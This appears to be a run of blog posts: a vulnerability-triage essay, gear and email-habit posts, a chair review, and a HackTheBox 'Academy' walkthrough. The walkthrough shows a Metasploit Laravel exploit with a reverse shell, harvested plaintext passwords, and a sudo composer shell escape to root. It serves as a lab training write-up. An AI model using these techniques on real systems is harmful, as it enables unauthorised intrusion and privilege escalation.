*As a side note, I wanted to quickly cover the difference between the concept of “Vulnerability Intelligence” and that of traditional Threat Intelligence (TI) (at least from my point of view). Where I delineate between the two is the idea that threat intel exists only where there are known (active) threats targeting an organization. Vulnerability intelligence on the other hand is where you have vulnerabilities which affect systems within an organizations environment. Together, where you have both a threat and a vulnerability, you have potential risk (the simple formula below represents this calculation). As you can (also) see via the image below, threat intel is typically a subset of vulnerability intel and is much smaller in volume. Finally, where you have known threats targeting vulnerabilities present in your environment you will likely need to invoke a vulnerability escalation process.

THREAT * VULNERABILITY = RISK

Vulnerability Metadata

Affected vendor / product / version
CVSS Base metrics (e.g. vector, complexity, privileges, user interaction, impact)
CVSS Temporal metrics (e.g. exploit code maturity, remediation level, report confidence)
Evidence of active exploitation in the wild
Dwell-time (how long has the vulnerability been known)

All together, there is no shortage of sources to retrieve vulnerability data from and a wealth of relevant metadata to collect from within these sources. In fact, it is best practice when performing vuln triage / risk analysis to reference a multitude of disparate sources to build the most complete picture of the true risk of a vulnerability. The more information you have, the more detailed you can be ( higher vuln triage level ) in that analysis and the higher fidelity your ultimate risk determination will be. With that said, you won’t always have a uniform/standardized view of a vulnerability and will need to make due with what is available. Similar to the inventory step, you need at a minimum the affected product (plus version) as well as SOME manner of vulnerability metadata. The more metadata you have, the more precise you can be in your risk determination.

Correlating Vulnerability Intelligence with Asset Inventory

OK, so we have our asset inventory and we have vulnerability intelligence to pair with it. From here we perform simple correlation between the products known to exist in our environment and the known vulnerabilities which affect those products. This rudimentary process is illustrated below.

Typically, this correlation is performed through the process of Vulnerability Scanning. This article doesn’t seek to cover scanning in much depth but it will be explained with the detail required to understand it’s function within the vulnerability triage process. In brief, vulnerability scanners are used to systematically detect and classify weaknesses on systems. Scanners perform this task in a variety of ways. By either authenticating directly then pulling a software inventory or by performing anonymous footprinting of a system, scanners can identify products and product versions across it’s scanned hosts. It then matches these identified products/versions using it’s own built in “plugins” which correspond to known vulnerabilities that affect respective products/versions.

So if vulnerability scanners are already doing this correlation, what is the problem?

Network vulnerability scanning tools rely on plugins provided by the scanner vendor to identify/correlate vulnerabilities. This means that if the vendor does not develop a plugin, a vulnerability may not be identified.
Plugins from the scanner vendors are not developed and released in real-time. This means there is some dwell-time between when a vulnerability is disclosed and when the vendor has developed a plugin available to identify it in an environment. This dwell-time means manual analysis may need to be performed for vulnerabilities which require immediate attention.
Scans of an environment are not performed real-time. Therefore, the data you are working with within the scan tool may be outdated when performing vulnerability triage correlation activities.
Scans are inherently invasive. This means there will be systems that can not be scanned or do not support scanning activities. In these cases, you will have a blind spot with traditional scan-based vuln triage.

For the vast majority of vulnerabilities, the speed in which findings must be “triaged” or otherwise analyzed for risk is completely satisfied by automated vulnerability scanning. In that world, high-risk findings are expected to be patched within some pre-set SLA timeframe, medium-risk findings have a different SLA and so on… It is the edge-cases (typically potential critical-risk findings), where manual triage is invoked and in those situations, there are improvements to be made.

Take for example a high-profile vulnerability or a zero-day vulnerability that has been announced by CISA in a bulletin. Below are some example steps a security analyst/team might take in triaging this vulnerability.

CISA announces a vulnerability that exhibits a few high/critical risk characteristics.
This disclosure is collected via a vulnerability intelligence source (such as Twitter).
A security analyst (or VM team) takes this disclosure/alert and begins vulnerability triage.
The security analyst first checks to see what products/versions are affected by the disclosed vulnerability.
The analyst then reviews known inventory sources (CMDB, scanners, etc..) to determine if the affected products exist within the organization’s environment.
If the product doesn’t exist in the environment, the issue is closed.
However if the affected product does exist in the environment, further analysis must be performed.
The analyst will want to determine whether the vulnerability meets the (or exhibits certain) criteria for a critical (or maybe even high) risk finding.
If the vulnerability is definitely not high/critical in nature, this often means no further manual triage is necessary. The vulnerability will be addressed via the normal vulnerability management process within the defined SLAs.
If however, the vulnerability does have certain high/critical-risk criteria, it should be further analyzed to determine technical risk and whether emergency or accelerated actions must be taken.
The analyst performs a thorough risk analysis of the finding based on any and all vulnerability metadata and metadata about the affected assets.
Where possible, the analyst will further enrich this risk determination based on known mitigating factors such as technical controls which may further reduce the residual risk.
Technical risk determination is then coupled with business context to come up with a final risk score.
Based on this residual risk value, a determination is made on how to prioritize mitigation/remediation/patching/risk treatments.

Phew!. That is quite a process right? If used sparingly, it really isn’t that much work. But at scale, performing this series of steps manually can be a time consuming task. This means, where security staffing is limited and quick decision making is needed, traditional vulnerability triage via scanning and manual analysis is not sufficient. Enter a new method for vuln triage…

Symphonic Vulnerability Surface Mapping

Symphonic Vulnerability Surface Mapping (“SVSM”) is a new approach to vulnerability triage and attack surface mapping. The idea is to ingest vulnerabilities in real-time from a wide variety of sources, correlate the vulnerability metadata (specifically affected product/version) with known inventory (also in real-time) and then (optionally) calculate risk and make prioritization decisions based on a fully-automated (or semi-automated) analysis engine. Let’s talk about how this can be done…

Identify vulnerability intelligence sources.
Build individual ingestors to extract normalized vulnerability metadata from different vulnerability data sources.
Leverage a metadata-parsing-engine (MPE) (leveraging ML, keywords, etc..) to facilitate extraction of relevant metadata from sources with non-standard formats.
Develop individual ingestors to populate asset inventory and extract normalized asset metadata from unique inventory sources.
Perform basic correlation of vulnerability and asset inventory data to determine high-level applicability and exposure.
Store correlated data in a database.
*Leverage advanced risk analysis engine (RAE) to perform automated risk analyses at scale.
*With risk scores in hand, deliver prioritized plan for addressing vulnerabilities.

*Steps 7 and 8 as described above are considered more advanced/higher order versions of your basic vulnerability triage process.

Ultimately, this process provides real-time feedback on potential exposures, risk calculations related to these findings and context for making treatment decisions. It does this at a speed which can not be obtained using traditional manual triage and automated scanning processes.

Security Control Plane (Advanced/Optional)

The Security Control Plane is a means in which to provide further enrichment to the risk analysis process. To fully understand the risk of any vulnerability as it applies to an affected system, one must also understand how the security controls in that environment help mitigate potential risks relevant to the vulnerability.

For example, if you have software that prevents execution of non-whitelisted binaries, then vulnerabilities which require execution of an untrusted binary may be rendered completely ineffective.

This understanding of security controls and how they effectively mitigate vulnerabilities can be applied to the risk analysis engine to better enrich residual risk determinations.

SVSM FAQ

So what make’s SVSM different?

Real-time correlation, analysis and prioritization of vulnerabilities as they are disclosed across a multitude of vulnerability intelligence feeds. SVSM takes what has always been a manual or relatively slow process and turns it into something that is real-time, dynamic and fully automated.

What’s the catch?

SVSM requires a relatively high-fidelity asset inventory. This inventory must at a minimum include product/version information mapped to unique system identifiers.

Why use multiple vulnerability intelligence sources?

No one vulnerability intelligence source has all relevant metadata needed to perform thorough risk analysis of a vulnerability as it applies to an affected system. Often in the process of risk analysis multiple sources are used to ultimately derive the final risk score. By parsing/ingesting data from a variety of sources, we can augment single-source analysis and get the clearest picture of risk.

What if I don’t have a lot of metadata?

No problem! SVSM is more than capable of performing correlation, risk analysis and decision making even with low-fidelity metadata. This flexibility provides the ability to perform everything from simple triage (am I exposed?) all the way to fully automated attack-surface mapping and risk analysis with robust prioritization.

What’s with the name “Symphonic Vulnerability Surface Mapping”?

SVSM is a new take on an age-old process. It utilizes the benefits of automation and orchestration to solve the issues that have always plagued vulnerability triage. SVSM is just my way of marketing this idea. The use of the term “symphonic” is a play on the established concept of “orchestration”.

Risk Analysis

In the context of vulnerability triage and SVSM, manual risk analysis is the nut we are trying to crack. Performing triage at scale is undoubtedly cumbersome and risk analysis as a component of that process is certainly one of the worst offenders from an overhead perspective. So how can we automate? First, let’s understand what criteria we are interested in when determining risk and how we use that criteria to calculate risk.

Risk Criteria

Vulnerability disclosure date (When was the vulnerability first published?)
Vulnerability dwell-time (The length of time a vulnerability has been present on a system)
Patch publish date (When, if applicable, was the patch itself published?)
Does the vulnerability affect business-critical systems?
Does the vulnerability affect systems which store/process sensitive data?
System type (e.g. database, server, network device, workstation, etc…)
Scope (i.e. limited vs. widespread)
Externality (e.g. internal, external, segmented, etc…)
Mitigating Controls ( Security Control Plane )
CVSS Base score (vector, complexity, privileges required, user interaction)
CVSS Temporal score (exploit code availability, patch availability, confidence level)

Risk Matrix

So how is risk typically calculated in practice? A simple risk matrix as shown below is an easy way to qualitatively derive a risk determination. However, this matrix only considers likelihood (probability) and impact in a vacuum. What it does not take into account is business context. It is recommended to also understand the business context of a system when determining a final risk score.

Vulnerability Escalation

As previously mentioned, not every vulnerability is worthy of manual triage. The overwhelming majority of vulnerabilities are expected to be addressed as a result of routine patching and standard prioritization sourced from typical vulnerability scanning activities. To determine which vulnerabilities ultimately require manual analysis, we use an escalation process flow coupled with a number of defined escalation criteria. This flow as well as the criteria are provided in more detail below.

Escalation Criteria

Zero-days
Named/publicized “designer” vulnerabilities
Vulnerabilities that are being targeted by threat groups in an active campaign
Critical-severity vulnerabilities that affect external-facing or sensitive assets
Vulnerabilities that affect a wide scope of systems
Vulnerabilities affecting business-critical systems

Vulnerabilities which have one or more of these characteristics are often candidates for further analysis to determine if they require accelerated treatment. The vulnerability escalation process flow depicted below helps further illustrate this concept.

Vulnerability Escalation Process Flow

Prioritization

Presumably, if risk analysis is thorough, prioritization is mostly a question of fixing the highest risk things first and then moving down the list. In reality however, there are a few additional factors that could further influence how vulnerabilities are ultimately prioritized post-analysis.

Level-of-effort (LoE) to patch
Is there a patch, workaround or mitigating control available to further mitigate risk?
Can applying a single fix remediate multiple vulnerabilities (or entire classes of vulnerabilites) at once? If so, and for example, there could be one fix which applies to a large number of medium-risk findings which if resolved at scale would reduce more risk than applying a single fix for a single high-risk finding.

Treatment

Though not really in scope for vulnerability triage, I wanted to at least mention the final step, Vulnerability Treatment, as it is crucial to the overall process of vulnerability management. It is within this step that vulnerabilities are reported, patched, resolved, mitigated, or otherwise addressed. What could be more important!

Vulnscape

SVSM as a concept is being brought to life through a new open-source tool dubbed Vulnscape! This tool is in very early stages, but over time, the goal is to develop the following as modular components…

Vulnerability ingestors for the wide variety of potential vulnerability intelligence sources
Asset inventory ingestors for the wide variety of enterprise asset inventory sources
A Metadata Parsing Engine (MPE) that will be used to extract relevant vulnerability metadata from non-standard vulnerability data sources
An automated (or semi-automated) Risk Analysis Engine (RAE) capable of risk-based decision making at scale
Prioritization features

With version 1.0, I aim to bring a limited set of inventory/vulnerability ingestors as well as a basic correlation capability (for high-level exposure notification). Stay tuned!

Potential Applications

SVSM and Vulnscape have applications that I think extend beyond just simple-to-advanced vulnerability triage. I see applications/integration opportunities in other domains as well. For example, it could be used in penetration testing activities related to “exploit suggesters”. Imagine hooking an SVSM tool like Vulnscape up to an exploit framework solution like Metasploit. Using this, you could more accurately target endpoints with exploits most likely to be successful. This is but one example of how Vulnscape could be applied beyond just vulnerability triage!

Conclusion

Thanks for taking the time to read! Feel free to contact me if you are interested in learning more about SVSM, or would like be a part of the future of Vulnscape.

Desk Setup 2021

Thu, 11 Mar 2021 08:40:00 -0500

Full time remote-work has necessitated a serious home-workstation. This post is dedicated to the gear that is part of my setup.

(Please ignore my poor cable management.)

This post was kept current until May 20, 2022. Go here for an up-to-date view of my setup.

Gear List

Desk : IKEA SKOGSTA 92” Dining Table
Chair : Secretlab TITAN (SoftWeave Charcoal Blue)
Computer : Apple Mac Pro 6,1 (Late 2013) [ 3.0 GHz 8-Core Intel Xeon E5 CPU, 64 GB 1866 MHz DDR3 Memory, AMD FirePro D300 2GB GPU, 1 TB SSD ] - Drives the three displays.
Keyboard : Apple Magic Keyboard
Trackpad : Apple Magic Trackpad 2 [ Silver ]
Mouse : Apple Magic Mouse 2 [ Silver ]
Other Computer(s) on Desk :
- Apple MacBook Pro (Retina, 15-inch, Mid 2015) [ 2.5 GHz Quad-Core Intel Core i7 CPU, 16 GB 1600 MHz DDR3 Memory, AMD Radeon R9 M370X 2 GB GPU, 500 GB SSD ]
- Apple PowerBook G4 [ 1.67 GHz PowerPC 64 CPU, 1 GB DDR2 SDRAM Memory, ATI Mobility Radeon 970 128 MB GPU, 100 GB HDD ]
Tablet : Apple iPad Pro (2021, M1, 11-inch, Space Gray, 512GB, Wi-Fi)
Monitors :
- Upper Curved Monitor : LG 38” Class Curved UltraWide Monitor (38CB99-W)
- Lower Monitors (x2) : LG 34” Class Monitor (34UB67-B)
Monitor Riser : Dual Monitor Bamboo Riser
KVM Switch : CKL USB 3.0 2x3 HDMI KVM Switch Triple Monitor 2 Port Extended Display
Laptop Dock : OWC Thunderbolt Dock
UPS : CyberPower CP1500PFCLCD Sinewave UPS System, 1500VA/1000W - Lives underneath the desk.
Webcam : Logitech Brio
Audio Interface : Universal Audio Apollo Twin MKII Duo
Studio Headphones : AKG Pro Audio K240 Studio Headphones
Other Headphones : Apple AirPods Max (Sky Blue)
Microphone : Audio-Technica AT2020 Cardioid Condenser Studio XLR Microphone
Boom Arm : Samson MBA48-48 Microphone Boom Arm
Speakers : Apple HomePod mini (x2)
Apple AirPods [2nd generation]
Elgato Stream Deck [MK.1]
Lights :
- Dyson Lightcycle Morph floor light [Black/Brass]
- Hue Iris table lamp
- Hue Lightstrip Plus base
- Hue Go portable light
- Hue Play light bar [double pack, white]
Computer Stand : OMOTON Vertical Laptop Stand
Fan : Dyson Pure Cool TP01 [White/Silver]
Storage : IKEA ALEX 9-Drawer Unit [ White ] - Not Pictured
Dongles & Cables :
- Amazon Basics XLR Microphone Cable - 25 feet
- Amazon Basics HDMI Cable - 6.5 feet
- Cable Matters 5-feet Cat6 Ethernet Patch Cable
- StarTech Mini DisplayPort to HDMI Video Adapter
- Anker USB-C to HDMI Adapter
- Apple Thunderbolt 2 Cable
- Apple Thunderbolt 3 (USB-C) to Thunderbolt 2 Adapter
- Stouchi USB-C Extension Cable - 6 feet
- Apple USB-C Charge Cable - 2 feet
- Apple 96W USB-C Power Adapter
- Amazon Basics 8-Outlet Power Strip Surge Protector
- Netgear 8-Port Gigabit Smart Managed Plus Switch
- Anker PowerPort Atom PD 2
- Apple Lightning to 3.5mm Audio Cable (1.2m, Black)
- MillSO 1/4 to 3.5mm Headphone Adapter TRS
Accoutrement :
- Plant : IKEA FEJKA
- Plant Holder : Some coffee mug I found in my house…
- Hot Wheels 2019 Tesla Model 3

Previous Setups

This setup has been a project for the last few years since I moved into the new space. In it’s earliest forms, it looked something like this…

Same core monitors but with books as risers and a folding table holding it all up. Yikes! Eventually, I bought the foundation as you see below… beautiful.

…and for a time my MacBook Pro ran the show.

Thanks for reading!

The Zen of Inbox Zero

Tue, 02 Mar 2021 09:52:00 -0500

Email is ubiquitous. Email is a deluge. Email is a mess. But there is a way… a way to quell the torrent of spam, subscriptions, notifications, alerts, reminders, social media updates, promotions, confirmations and whatever else seeks to wreak havoc on your inbox - Inbox Zero.

This concept was first introduced by Merlin Mann during a Google TechTalk in 2007. I’ve never actually watched this video nor do I remember when I was first introduced to the idea of “Inbox Zero” but I’ve been very successful in remaining true to my idea of this concept for well over a decade and I’m here to say it has brought sanity and control to my digital life and it can for you too.

What you see below is madness…

…Madness? This. is. EMAIL!

Let’s Zero It Out

Despite it’s name, Inbox Zero is not about having nothing in your inbox. Rather, it is about having a repeatable process by which you can deal with each email you receive, which in turn gives you control over your inbox and reduces what remains to only the items that are either pending and/or actionable. Let’s walk through this process…

Unsubscribe: I recommend a scorched-earth approach to unsubscribing to subscription-based emails. Unless you absolutely need something, click that “unsubscribe” button and be rid of it. Pro Tip: If an email doesn’t have an “Unsubscribe” link, mark it as spam or even create a mail rule to auto-send it where it belongs - anywhere but your inbox.
Consume: A lot of email is simply informational. Anything in your inbox that matches this criteria can easily be archived (Step 5) or deleted (Step 6) once you have consumed the necessary information. If you find the information not-useful, perhaps consider Step 1.
Take Action: Does the email represent something that needs to be done? If so, do what needs to be done and then archive (Step 5) or delete (Step 6) the respective email. If it can’t be done right now due to a dependency, see Step 4. *If it CAN be done but you don’t have time for it, simply leave it in your inbox until you can get to it. In this way, these emails will serve as constant reminders of things that need to and can be done.
Save For Later: If an email represents something that needs to be done but can’t be done due to a dependency, move it to a separate folder (or label if your a Gmail person). I have a folder literally called “For Later” that these to-do emails go to. All of these to-do emails should go to the same special “For Later” folder. *It is important to revisit this folder on a frequent basis to see if there is anything that no longer has dependencies and is thus actionable. Here, you can do what needs to be done and then proceed to archive (Step 5) or delete (Step 6) the email.
Archive: When you are through with an email but would like to keep it for later-reference, archive it or move it to a folder of your choosing. This will effectively remove it from your inbox.
Trash: For everything else, trash it. You don’t need it. Get it out of your inbox. Pro Tip: Be mindful of what you are trashing. Chances are, if you are trashing an email, it should have never been in your inbox to begin with. I recommend unsubscribing from as many of these would-be-trashed emails as you can.

Wrapping Up

I’ve always fancied myself a minimalist. This mindset helps me make “tough” decisions when it comes to unsubscribing, trashing or otherwise being “real” with myself about what I need or don’t need in my life. I’m also a particularly organized individual, especially with respect to my digital life. Inbox Zero is a manifestation of these two virtues and is a philosophy that with some practice, can be exercised by anyone. With it, you too can reclaim your inbox, get things done and achieve digital zen.

For more on the science of Inbox Zero, check out Part Two!

HackTheBox: Academy

Sun, 28 Feb 2021 09:50:00 -0500

A walkthrough of the HackTheBox system “Academy”. From the Shellsharks HackTheBox walkthrough series.

Jump to Section

Reconnaissance
Foothold
User
Root

Reconnaissance

NMAP. Always NMAP.

└─$ sudo nmap -n -sS -sV 10.10.10.215                                                                                                               1 ⨯
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 21:00 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

OK. So NMAP is reporting that the host is down. Well we know the host is there so… Let’s try the -Pn flag…

└─$ sudo nmap -n -sS -sV 10.10.10.215 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 21:00 EST
Nmap scan report for 10.10.10.215
Host is up (0.098s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There we go. Ok, so ports 22 and 80 appear to be listening. I add “10.10.10.215 academy.htb” to /etc/hosts and then head off to the web server… After registering a user and poking around for a bit, I don’t see anything too interesting. Taking a closer look at the registration (/register.php) page source however I see a hidden form field for “roleid”. Let’s take a closer look at this.

<td align="right"><input class="input" size="40" type="password" id="confirm" name="confirm" /></td>
                </tr>
                <input type="hidden" value="0" name="roleid" />
            </table>
            <br/><br/>

Firing up burp, configuring the proxy settings in Firefox and toggling the intercept, I submit a new registration request and change the roleid to “1” instead of “0”. After this, I attempt logging in with this user and… nothing. At first brush, this doesn’t seem to add much functionality. So back to enumeration…

…after some time… Fire up dirb!

dirb was able to find a /admin.php resource.

┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
└─$ dirb http://academy.htb common.txt                                                                                                              1 ⚙

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jan 22 22:05:45 2021
URL_BASE: http://academy.htb/
WORDLIST_FILES: common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://academy.htb/ ----
+ http://academy.htb/admin.php (CODE:200|SIZE:2633)  

Foothold

Alright, so now on this admin.php login page, I use the account I just created which permits me to the “admin” section of the site. Here on this page I see a reference to a “dev-staging-01.academy.htb”. Nice - we’ve got some additional application surface.

<td>Fix issue with dev-staging-01.academy.htb</td>
<td>pending</td>

I add this to my /etc/hosts and whisk myself to this new subdomain. This page has a bunch of strange looking exception logs. Included in the presented log is a bunch of environment variables. Notably, I find a variable with a value “Laravel” and a base-64 encoded “APP_KEY” value.

Environment Variables
APP_NAME 	"Laravel"
...
APP_KEY 	"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="

A little Google-hunting and sure enough, there’s a Metasploit module which seems like it could be relevant! I fire up msf and search for “laravel”. I find the module “unix/http/laravel_token_unserialize_exec”. I set the options of the module as shown below…

set APP_KEY to the base64 encoded key you found in the log.
set RHOSTS to 10.10.10.215.
set VHOST to dev-staging-01.academy.htb.
set LHOST to your host.

A li’l exploit -j…

msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/http/laravel_token_unserialize_exec) >
[*] Started reverse TCP handler on 10.10.14.17:4444
[*] Command shell session 1 opened (10.10.14.17:4444 -> 10.10.10.215:39562) at 2021-01-22 22:17:03 -0500

Got me a shell session. Let’s drop in…

msf6 exploit(unix/http/laravel_token_unserialize_exec) > sessions -i 1
[*] Starting interaction with 1...

hostname
academy
whoami
www-data

Got me a foothold as www-data.

User

First I upgrade muh shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Some more research on Laravel reveals that some sensitive information is typically stored in .env files. A little hunting on the system and I find a .env in /var/www/html/academy/ which indeed has some interesting stuff.

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

Using these creds for mysql ended up being a no-go, so i tried to use them elsewhere. Taking a look at /etc/passwd I see a bunch of potential users these credentials may possibly work for.

mrb3n:x:1001:1001::/home/mrb3n:/bin/sh
cry0l1t3:x:1002:1002::/home/cry0l1t3:/bin/sh
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
21y4d:x:1003:1003::/home/21y4d:/bin/sh
ch4p:x:1004:1004::/home/ch4p:/bin/sh
g0blin:x:1005:1005::/home/g0blin:/bin/sh

Eventually, I find that the creds do work for user cry0l1t3.

Root

Alright, now as cry0l1t3 let’s do a little Linux privesc enum. LinPEAS is a decent option for this. Grepping through the output of this script for different user names on the system I find some interesting results for mrb3n.

1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>

Alternatively, /var/log/audit/audit.log.3 has some hex encoded data that can be de-encoded to find this same password.

type=TTY msg=audit(1597199290.086:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199304.778:89): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=77686F616D690A
type=TTY msg=audit(1597199308.262:90): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
type=TTY msg=audit(1597199317.622:93): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=2F62696E2F62617368202D690A
type=TTY msg=audit(1597199443.421:94): tty pid=2606 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E18790D
type=TTY msg=audit(1597199533.458:95): tty pid=2643 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=1B5B421B5B411B5B411B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B427F1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E18790D
type=TTY msg=audit(1597199575.087:96): tty pid=2686 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=3618790D
type=TTY msg=audit(1597199606.563:97): tty pid=2537 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=63611B5B411B5B411B5B417F7F636174206175097C206772657020646174613D0D636174206175097C20637574202D663131202D642220220D1B5B411B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B431B5B436772657020646174613D207C200D1B5B41203E202F746D702F646174612E7478740D69640D6364202F746D700D6C730D6E616E6F2064090D636174206409207C207878092D72202D700D6D617F7F7F6E616E6F2064090D6361742064617409207C20787864202D7220700D1B5B411B5B442D0D636174202F7661722F6C6F672F61750974097F7F7F7F7F7F6409617564097C206772657020646174613D0D1B5B411B5B411B5B411B5B411B5B411B5B420D1B5B411B5B411B5B410D1B5B411B5B411B5B410D657869747F7F7F7F686973746F72790D657869740D
type=TTY msg=audit(1597199606.567:98): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
type=TTY msg=audit(1597199610.163:107): tty pid=2709 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=2F62696E2F62617368202D690A
type=TTY msg=audit(1597199616.307:108): tty pid=2712 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=6973746F72790D686973746F72790D657869740D
type=TTY msg=audit(1597199616.307:109): tty pid=2709 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A

Using those creds I can now login as mrb3n. Running sudo -l as this new user I see a binary I can run as super user.

$ sudo -l
sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!

Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Throwing this into Google I see a nice little GTFOBin. Let’s try it out.

$ TF=$(mktemp -d)
TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
sudo composer --working-dir=$TF run-script x
[sudo] password for mrb3n: mrb3n_Ac@d3my!

PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami
whoami
root

YAY! Root.

Herman Miller Logitech Embody Review

Fri, 12 Feb 2021 09:50:00 -0500

Like many of us these days (in the pandemic-age), I spend a large portion of any given week sitting in my home-office at my desk. For too long I had resigned myself to sitting in a chair that featured no customization, no back support and no particular ergonomic advantages. Given the time I spend in a chair, I decided I need an upgrade and resolved to find an amazing chair, no matter the cost.

TL;DR: The Logitech G Embody has a critical design flaw which results in the chair being very uncomfortable to sit in. This flaw makes this chair a no-go at any price, much less $1500.

In my search for the best possible chair, I consistently came across positive reviews for chairs from Herman Miller. Specifically, the Aeron and the Embody were two models that I saw mentioned again and again. After seeing pictures of the Embody, I fell in love with the design (specifically the cool-looking back of the chair). It was then of course that I then discovered the Logitech variant of the traditional Embody chair. Right off the bat though, the problem with this chair is the price. $1500… For a chair… But! My mission was to find the best chair for me, and I wasn’t going to let the cost be too much of an obstacle.

The Logitech version of the chair features the same design and features of the regular version but now sports an “enhanced gaming seat” (ironic as I’ll soon find out), which is basically an added layer of cushion on the bottom as well as a copper-infused “cooling” foam embedded within that seat cushion. Couple these added comfort features with (awesome) blue color accents unique to the Logitech version of this chair and I was sold. Yes, this chair costs $1500. But surely this is a worthy investment if it makes sitting for extended periods of time both enjoyable, comfortable and better-for-me right?!

The Review

The chair arrives in a massive box, completely assembled. You need only open the box and roll it on out - sweet! That said, the chair has a certain heft to it and carrying up a few flights of stairs to my office took a bit of effort. Once I did get it in front of my desk though, I took a step back to admire it. If nothing else, it certainly looked cool! (Please ignore my poor cable-management.)

With the chair in place, I sat down and ran through Herman Miller’s adjustment guide to get it tweaked to my liking. With the first (fully adjusted) sit, my initial opinion was… “the chair seems comfortable, maybe not $1500 comfortable, but comfortable all the same.” But as I would find out, first impressions only go so far…

Before I get to what I didn’t like about this chair, let me gush about what it gets right. The seat-back is in my mind the best part of this chair. Moving beyond it’s unique and interesting design, the PostureFit / BackFit spinal support tech built into the back of this chair feels really good. It not only supports your back in a way that is very comforting but it flexes and moves as you do which helps maintain this support as you change posture or wiggle about in the chair. But(t)!, (pun intended) the seat itself, the bottom of this chair, is where things begin to fail.

